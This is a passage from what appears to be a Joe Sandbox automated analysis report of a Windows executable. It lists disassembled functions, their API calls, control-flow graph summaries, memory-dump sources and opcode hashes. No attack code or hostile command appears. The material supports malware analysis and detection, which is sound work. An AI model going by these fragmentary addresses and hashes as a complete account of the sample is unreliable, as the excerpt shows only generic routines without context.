                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 635176117-0
                                                                                                                                                                                                                                                • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                                                                                                                                                                                • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89
                                                                                                                                                                                                                                                Function 00404A44 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1308 404a44-404a62 call 408676 ??2@YAPAXI@Z 1311 404a64-404a6b call 40a9f8 1308->1311 1312 404a6d 1308->1312 1314 404a6f-404a91 call 408726 call 40dcfb 1311->1314 1312->1314 1341 404a92 call 40b2fc 1314->1341 1342 404a92 call 40a7de 1314->1342 1319 404a95-404a97 1320 404ab3-404abd 1319->1320 1321 404a99-404aa9 call 407776 1319->1321 1323 404ada-404ae4 ??2@YAPAXI@Z 1320->1323 1324 404abf-404ac1 call 403354 1320->1324 1337 404aae-404ab2 1321->1337 1325 404ae6-404aed call 404292 1323->1325 1326 404aef 1323->1326 1331 404ac6-404ac9 1324->1331 1330 404af1-404af6 call 40150b 1325->1330 1326->1330 1336 404afb-404afd 1330->1336 1331->1323 1335 404acb 1331->1335 1338 404ad0-404ad8 1335->1338 1336->1338 1338->1337 1341->1319 1342->1319
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(000001E8,00000000,?,ExecuteFile,0000000E,?,00405D20,?,00417788,00417788), ref: 00404A5A
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000040,?,?,?,?,?,?,?,?,00000000,?), ref: 00404ADC
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@
                                                                                                                                                                                                                                                • String ID: ExecuteFile
                                                                                                                                                                                                                                                • API String ID: 1033339047-323923146
                                                                                                                                                                                                                                                • Opcode ID: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                                                                                                                                                                                                                                • Instruction ID: 446d0bd8c70a379003bbf02419fa435b46014474c8a02eb0da5acec479ce97d7
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fa0511c003ccdb3ab72568a6a3a656966613ea7ca94b66f833361549b4052979
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA1184B5340104BFD710AB659C85D6B73A8EF80355724443FF602B72D1DA789D418A6D
                                                                                                                                                                                                                                                Function 0040ADC3 Relevance: 4.5, APIs: 3, Instructions: 35COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 1343 40adc3-40adce 1344 40add0-40add3 1343->1344 1345 40ae0d-40ae0f 1343->1345 1346 40add5-40ade3 ??2@YAPAXI@Z 1344->1346 1347 40adfb 1344->1347 1348 40adfd-40ae0c ??3@YAXPAX@Z 1346->1348 1349 40ade5-40ade7 1346->1349 1347->1348 1348->1345 1350 40ade9 1349->1350 1351 40adeb-40adf9 memmove 1349->1351 1350->1351 1351->1348
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                                                                                                                                                                • memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@??3@memmove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3828600508-0
                                                                                                                                                                                                                                                • Opcode ID: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                                                                                                                                                                                                                                                • Instruction ID: a8ce0a3cb4653ecb547b1a3698f229d81d6147035ad3680bc60947505803a3f4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 681e1b0d226f40fe4ab8b8450f07d9ff2e75d0d2427af455dbd11f2bdce48d51
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 74F089763047016FC3205B1ADC80857BBABDFC4715311883FE55E93A50D634F891965A
                                                                                                                                                                                                                                                Function 0040245A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 0040247E
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: GlobalMemoryStatus
                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                • API String ID: 1890195054-2766056989
                                                                                                                                                                                                                                                • Opcode ID: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                                                                                                                                                                                • Instruction ID: 9ce3ff159218229c34eda893c3d8d64f83397f3f2cddac743d7c565554413103
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e165e649a9da5613d175048000a137ea24de4513e4899c41680211bbe6bcf060
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AAF0AF30A042048ADF15AB719E8DA5A37A4BB00348F10853AF516F52D4D7BCE9048B5D
                                                                                                                                                                                                                                                Function 0040C9FC Relevance: 3.2, APIs: 2, Instructions: 184COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 0040AAAB: _CxxThrowException.MSVCRT(?,00414EF8), ref: 0040AAC5
                                                                                                                                                                                                                                                  • Part of subcall function 0040ADC3: ??2@YAPAXI@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040ADD6
                                                                                                                                                                                                                                                  • Part of subcall function 0040ADC3: memmove.MSVCRT(00000000,?,?,?,?,?,0040B1B6,00010000), ref: 0040ADF0
                                                                                                                                                                                                                                                  • Part of subcall function 0040ADC3: ??3@YAXPAX@Z.MSVCRT(?,?,?,?,0040B1B6,00010000), ref: 0040AE00
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,004149F0,?,004149B0), ref: 0040CAF2
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,004149F0,?,004149B0), ref: 0040CC4A
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@$??2@ExceptionThrowmemmove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 4269121280-0
                                                                                                                                                                                                                                                • Opcode ID: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                                                                                                                                                                                • Instruction ID: 88480e7f7e551c391a26326ce122d220a9eefc885560dc6ed21150e7f5ba8ef6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 55a34ad2a1bb823cdc9ec8962d94a78352b48210c79ef81d7d99dd1713e8f51f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 00712571A00209EFCB24DFA5C8D1AAEBBB1FF08314F10463AE545A3291D739A945CF99
                                                                                                                                                                                                                                                Function 0040A62F Relevance: 3.1, APIs: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??3@H_prolog
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1329742358-0
                                                                                                                                                                                                                                                • Opcode ID: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                                                                                                                                                                                • Instruction ID: 956102545b91a7c0cba0a64d671320761176ea25dc816e9057e3d4af94f09eda
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6656e43d2981dee3a96cb881ff7527404ad10ce0abe68b4cdaafc38c009261e5
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D411F32800204AFCB09DB65CD45EBE7B35EF50304B18883BF402B72E2D63E9E21965B
                                                                                                                                                                                                                                                Function 0040112B Relevance: 3.0, APIs: 2, Instructions: 42COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 0040114B
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,00401425,00000003,?,0040502D,?,?,00000000), ref: 00401171
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                                                                                                                • Opcode ID: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
                                                                                                                                                                                                                                                • Instruction ID: 063e94d8e06ff9613a5b681c15dc067c338ae4066a9753272274ce5f9f11bd0f
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 453a3e3f1ff100c9dcfb77a92201942aa697f3f866fb972755d4e05e551f17b9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 71F0A476210612ABC334DF2DC581867B3E4EF88711710893FE6C7C72B1DA31A881C754
                                                                                                                                                                                                                                                Function 004022B0 Relevance: 3.0, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022C0
                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000024,004025DB,00000001,00000020,00402AB6,00000000,00000000,00000000,00000020), ref: 004022E4
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                                                                                                                • Opcode ID: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                                                                                                                                                                                                                                                • Instruction ID: 09ebe67ff45b08f81c36141d9c2dc2e417a159b47c448e0a3757dda97e47d19e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 161b1d3c566106e9ad65e75d5d4507556b29aa609190ea75727e2c569a68f83b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8CF030351046529FC330DF69C584853F7E4EB59715721887FE1D6D36A2C674A880CB64
                                                                                                                                                                                                                                                Function 0040D9F0 Relevance: 3.0, APIs: 2, Instructions: 30COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFilePointer.KERNELBASE(?,?,?,?), ref: 0040DA0B
                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 0040DA19
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 2976181284-0
                                                                                                                                                                                                                                                • Opcode ID: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                                                                                                                                                                                • Instruction ID: d86f9e507f4e039952bd1031b0dc001be1b0661bb6f0ed5f18f0f7cd7a7605a3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d304dccc413f9fbc2375b0c992bb18d0fa27bc648f40137314f68655dcdcf89d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FCF0B2B8A04208FFCB04CFA8D8448AE7BB9EB49314B2085A9F815A7390D735DA04DF64
                                                                                                                                                                                                                                                Function 0040ECED Relevance: 3.0, APIs: 2, Instructions: 24memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0040ED05
                                                                                                                                                                                                                                                • _CxxThrowException.MSVCRT(?,00415010), ref: 0040ED28
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocExceptionStringThrow
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3773818493-0
                                                                                                                                                                                                                                                • Opcode ID: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                                                                                                                                                                                • Instruction ID: 896a1b371a95ab63a3f889c911e7bff8eb1facf706b7c8fcc1dab20228dace7a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 34848b6f66320e7823decd545e24a334e79eeaa2350f65fc9219e56b57dd4bad
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CDE06D71600309ABDB10AF66D8419D67BE8EF00380B00C83FF948CA250E779E590C7D9
                                                                                                                                                                                                                                                Function 0040E73A Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 0040E745
                                                                                                                                                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?), ref: 0040E764
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3168844106-0
                                                                                                                                                                                                                                                • Opcode ID: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                                                                                                                                                                                • Instruction ID: 086d926b78662e0ab04275255430a857868cdabe8091615e808f779c17768b54
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91dbafe27853da7d419d240d9f0ee1b362973845cd939a0bd3a75ec29d074311
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 76F05436200214FBCB119F95DC08E9BBBB9FF49761F14842AF945E7260C771E821DBA4
                                                                                                                                                                                                                                                Function 0040A7DE Relevance: 1.6, APIs: 1, Instructions: 74COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: H_prolog
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3519838083-0
                                                                                                                                                                                                                                                • Opcode ID: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                                                                                                                                                                • Instruction ID: 39d544f4fee3d18347c8ea8d59cce7c7d4ef222c74644271f89bd24cd9d44c54
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e5321c9a15e7e390b560e3b31c2ad4413e862a9b2ae91dd544a8c0e33ade4a6e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4B2180316003099BCB14EFA5C945AAE73B5EF40344F14843EF806BB291DB38DD16CB1A
                                                                                                                                                                                                                                                Function 0040120B Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesW.KERNELBASE(?,?), ref: 0040124F
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000F.00000002.2343634378.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343617472.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343656545.0000000000413000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343678151.0000000000417000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.000000000041A000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000000F.00000002.2343694813.0000000000432000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_15_2_400000_TCUINOVJ.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                                                                                • Opcode ID: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                                                                                                                                                                • Instruction ID: 5817d5120c2da98d16edaa91ace5ca285f5b3ff1e58b2ffd557e42fef7bfdc6e
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5adc5d60a7dd4af011d60b8927d5fbfdd00464e259639d1fcd3b0c23b8927a9d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 66F05E72100201DBC720AF98C840BA777F5BB84314F04483EE583F2AA0D778B885CB59
                                                                                                                                                                                                                                                Function 0040DA56 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
